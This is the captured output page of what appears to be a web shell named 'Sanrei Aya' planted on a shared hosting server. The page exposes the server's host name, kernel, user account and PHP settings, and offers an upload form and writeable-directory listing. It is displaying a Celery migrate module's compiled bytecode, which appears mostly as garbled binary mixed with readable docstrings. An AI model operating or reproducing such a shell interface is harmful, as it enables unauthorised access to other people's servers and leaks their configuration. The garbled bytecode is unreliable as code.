Yohohohohohooho | Sanrei Aya
Sanrei Aya


Server : LiteSpeed
System : Linux barito.iixcp.rumahweb.net 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
User : elvh3918 ( 1528)
PHP Version : 8.2.31
Disable Function : mail
Directory :  /usr/local/lib/python3.9/site-packages/celery/contrib/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/local/lib/python3.9/site-packages/celery/contrib/__pycache__/migrate.cpython-39.pyc
a

��Sh8�@sddZddlZddlmZddlmZmZddlmZm	Z	ddl
mZddlm
Z
ddlmZdd	lmZdd
lmZdZdZGd
d�de�ZGdd�d�Zd4dd�Zd5dd�Zdd�Zeddfdd�Zdd�Zd6dd�Zdd�Zdd �Z d!d"�Z!d#d$�Z"Gd%d&�d&�Z#d7d)d*�Z$d+d,�Z%d-d.�Z&d/d0�Z'd1d2�Z(eeed3�Z)ee%ed3�Z*ee&ed3�Z+ee'ed3�Z,dS)8z,Message migration tools (Broker <-> Broker).�N)�partial)�cycle�islice)�Queue�	eventloop)�
maybe_declare)�ensure_bytes)�app_or_default)�
worker_direct)�str_to_list)�
StopFiltering�State�	republish�migrate_task�
migrate_tasks�move�
task_id_eq�
task_id_in�start_filter�move_task_by_id�
move_by_idmap�move_by_taskmap�move_direct�move_direct_by_idzGMoving task {state.filtered}/{state.strtotal}: {body[task]}[{body[id]}]c@seZdZdZdS)rz*Semi-predicate used to signal filter stop.N)�__name__�
__module__�__qualname__�__doc__�rr�@/usr/local/lib/python3.9/site-packages/celery/contrib/migrate.pyrsrc@s0eZdZdZdZdZdZedd��Zdd�Z	dS)r
zMigration progress state.rcCs|js
dSt|j�S)N�?)�	total_apx�str��selfrrr�strtotal&szState.strtotalcCs$|jrd|j��S|j�d|j��S)N�^�/)�filtered�countr%r#rrr�__repr__,szState.__repr__N)
rrrrr)r(r!�propertyr%r*rrrrr
s
r
c
Cs�|sgd�}t|j�}|j|j|j}}}|dur<|dn|}|durP|dn|}|j|j}	}
|�dd�}|�dd�}|dur�t|�nd}|D]}
|�|
d�q�|j	t|�f|||||	|
|d�|��dS)zRepublish message.)Zapplication_headers�content_type�content_encoding�headersN�exchange�routing_key�compression�
expiration)r/r0r1r.r,r-r2)
r�body�
delivery_infor.�
propertiesr,r-�pop�float�publish)�producer�messager/r0Zremove_propsr3�infor.�props�ctype�encr1r2�keyrrrr2s*
�
��rcCs>|j}|durin|}t|||�|d�|�|d�d�dS)zMigrate single task message.Nr/r0�r/r0)r4r�get)r9Zbody_r:�queuesr;rrrrPs�rcs��fdd�}|S)Ncs�r|d�vrdS�||�S�N�taskr�r3r:��callback�tasksrrr([sz!filter_callback.<locals>.filteredr)rGrHr(rrFr�filter_callbackYsrIcsVt|�}t���|jj|dd��t|��d�}��fdd�}t|||f�|d�|��S)z)Migrate tasks from one broker to another.F)Zauto_declare�rBcsh|�j�}��|j|j�|_|j|jkr:��|j|j�|_|jj|jkr\��|j|j�|j_|��dS�N)�channelrA�namer0r/Zdeclare)�queueZ	new_queue�r9rBrr�on_declare_queueks
�z'migrate_tasks.<locals>.on_declare_queue)rBrP)r	�prepare_queues�amqp�Producerrr)�source�destZmigrate�apprB�kwargsrPrrOrrcs
��rcCst|t�r|jj|S|SrK)�
isinstancer"rRrB)rV�qrrr�_maybe_queueys
rZc	
s�t����fdd�|pgD�p d}
�j|dd��V��j����t�����������	f	dd�}t��|fd|
i|	��Wd�S1s�0YdS)	aG	Find tasks by filtering them and move the tasks to a new queue.

    Arguments:
        predicate (Callable): Filter function used to decide the messages
            to move.  Must accept the standard signature of ``(body, message)``
            used by Kombu consumer callbacks.  If the predicate wants the
            message to be moved it must return either:

                1) a tuple of ``(exchange, routing_key)``, or

                2) a :class:`~kombu.entity.Queue` instance, or

                3) any other true value means the specified
                    ``exchange`` and ``routing_key`` arguments will be used.
        connection (kombu.Connection): Custom connection to use.
        source: List[Union[str, kombu.Queue]]: Optional list of source
            queues to use instead of the default (queues
            in :setting:`task_queues`).  This list can also contain
            :class:`~kombu.entity.Queue` instances.
        exchange (str, kombu.Exchange): Default destination exchange.
        routing_key (str): Default destination routing key.
        limit (int): Limit number of messages to filter.
        callback (Callable): Callback called after message moved,
            with signature ``(state, body, message)``.
        transform (Callable): Optional function to transform the return
            value (destination) of the filter function.

    Also supports the same keyword arguments as :func:`start_filter`.

    To demonstrate, the :func:`move_task_by_id` operation can be implemented
    like this:

    .. code-block:: python

        def is_wanted_task(body, message):
            if body['id'] == wanted_id:
                return Queue('foo', exchange=Exchange('foo'),
                             routing_key='foo')

        move(is_wanted_task)

    or with a transform:

    .. code-block:: python

        def transform(value):
            if isinstance(value, str):
                return Queue(value, Exchange(value), value)
            return value

        move(is_wanted_task, transform=transform)

    Note:
        The predicate may also return a tuple of ``(exchange, routing_key)``
        to specify the destination to where the task should be moved,
        or a :class:`~kombu.entity.Queue` instance.
        Any other true value means that the task will be moved to the
        default exchange/routing_key.
    csg|]}t�|��qSr)rZ)�.0rN)rVrr�
<listcomp>��zmove.<locals>.<listcomp>NF)�poolcs��||�}|r��r�|�}t|t�rBt|�j�|jj|j}}nt|���\}}t�|||d�|�	��j
d7_
�r���||��r��j
�kr�t��dS)Nr@�)rXrrZdefault_channelr/rMr0�expand_destr�ackr(r)r3r:�ret�ex�rk)	rG�connr/�limit�	predicater9r0�state�	transformrr�on_task�s"

�zmove.<locals>.on_task�consume_from)r	Zconnection_or_acquirerRrSr
r)rg�
connectionr/r0rTrVrGrfrirWrBrjr)
rVrGrer/rfrgr9r0rhrirrs>rc	Cs6z|\}}Wn ttfy,||}}Yn0||fSrK)�	TypeError�
ValueError)rbr/r0rcrdrrrr`�s
r`cCs|d|kS)z'Return true if task id equals task_id'.�idr)�task_idr3r:rrrr�srcCs|d|vS)z-Return true if task id is member of set ids'.ror)�idsr3r:rrrr�srcCs@t|t�r|�d�}t|t�r0tdd�|D��}|dur<i}|S)N�,css(|] }ttt|�d��dd��VqdS)�:N�)�tuplerr�split�r[rYrrr�	<genexpr>�s�z!prepare_queues.<locals>.<genexpr>)rXr"rv�list�dictrJrrrrQ�s


�rQc@sFeZdZddd�Zdd�Zdd	�Zd
d�Zdd
�Zdd�Zdd�Z	dS)�FiltererN��?Fcs�|�_|�_|�_|�_|�_|�_tt|�p0g��_t	|��_
|	�_|
�_|�_
�fdd�|pht�j
�D��_|
pxt��_|�_dS)Ncsg|]}t�j|��qSr)rZrVrwr#rrr\	s�z%Filterer.__init__.<locals>.<listcomp>)rVre�filterrf�timeout�ack_messages�setrrHrQrBrG�foreverrPryrkr
rh�accept)r$rVrer}rfr~rrHrBrGr�rPrkrhr�rWrr#r�__init__�s 

�zFilterer.__init__c	Csx|�|����Tzt|j|j|jd�D]}q&Wn$tjyBYntyRYn0Wd�n1sh0Y|jS)N)r~Zignore_timeouts)	�prepare_consumer�create_consumerrrer~r��socketrrh)r$�_rrr�starts�
$zFilterer.startcCs.|jjd7_|jr*|jj|jkr*t��dS)Nr_)rhr)rfr�r$r3r:rrr�update_stateszFilterer.update_statecCs|��dSrK)rar�rrr�ack_message#szFilterer.ack_messagecCs|jjj|j|j|jd�S)N)rBr�)rVrRZTaskConsumerrerkr�r#rrrr�&s
�zFilterer.create_consumercCs�|j}|j}|j}|jr<t||j�}t||j�}t||j�}|�|�|�|�|jrb|�|j�|jdur�t|j|j	�}|jr�t||j�}|�|�|�
|�|SrK)r}r�r�rHrIZregister_callbackrrGrrh�declare_queues)r$�consumerr}r�r�rGrrrr�-s$




zFilterer.prepare_consumerc	Cs�|jD]t}|jr|j|jvrq|jdur2|�|�z0||j�jdd�\}}}|r`|jj|7_Wq|jjyxYq0qdS)NT)Zpassive)	rBrMrPrLZ
queue_declarerhr!reZchannel_errors)r$r�rNr�Zmcountrrrr�As


��zFilterer.declare_queues)Nr|FNNNFNNNN)
rrrr�r�r�r�r�r�r�rrrrr{�s�
r{r|FcKs0t|||f|||||||	|
|||
d�|����S)z
Filter tasks.)rfr~rrHrBrGr�rPrkrhr�)r{r�)rVrer}rfr~rrHrBrGr�rPrkrhr�rWrrrrQs"��
�rcKst||ifi|��S)a�Find a task by id and move it to another queue.

    Arguments:
        task_id (str): Id of task to find and move.
        dest: (str, kombu.Queue): Destination queue.
        transform (Callable): Optional function to transform the return
            value (destination) of the filter function.
        **kwargs (Any): Also supports the same keyword
            arguments as :func:`move`.
    )r)rprUrWrrrrfsrcs$�fdd�}t|fdt��i|��S)a�Move tasks by matching from a ``task_id: queue`` mapping.

    Where ``queue`` is a queue to move the task to.

    Example:
        >>> move_by_idmap({
        ...     '5bee6e82-f4ac-468e-bd3d-13e8600250bc': Queue('name'),
        ...     'ada8652d-aef3-466b-abd2-becdaf1b82b3': Queue('name'),
        ...     '3a2b140d-7db1-41ba-ac90-c36a0ef4ab1f': Queue('name')},
        ...   queues=['hipri'])
    cs��|jd�S)NZcorrelation_id)rAr5rE��maprr�task_id_in_map�sz%move_by_idmap.<locals>.task_id_in_maprf)r�len)r�rWr�rr�rrtsrcs�fdd�}t|fi|��S)aMove tasks by matching from a ``task_name: queue`` mapping.

    ``queue`` is the queue to move the task to.

    Example:
        >>> move_by_taskmap({
        ...     'tasks.add': Queue('name'),
        ...     'tasks.mul': Queue('name'),
        ... })
    cs��|d�SrC)rArEr�rr�task_name_in_map�sz)move_by_taskmap.<locals>.task_name_in_map)r)r�rWr�rr�rr�srcKsttjf||d�|���dS)N)rhr3)�print�MOVING_PROGRESS_FMT�format)rhr3r:rWrrr�
filter_status�sr�)ri)NNN)N)NNNNNNNN)Nr|FNNNFNNNN)-rr��	functoolsr�	itertoolsrrZkomburrZkombu.commonrZkombu.utils.encodingrZ
celery.appr	Zcelery.utils.nodenamesr
Zcelery.utils.textr�__all__r��	Exceptionrr
rrrIrrZrr`rrrQr{rrrrr�rrZmove_direct_by_idmapZmove_direct_by_taskmaprrrr�<module>sV�

	
�
�
[Z�


Yohohohohohooho | Sanrei Aya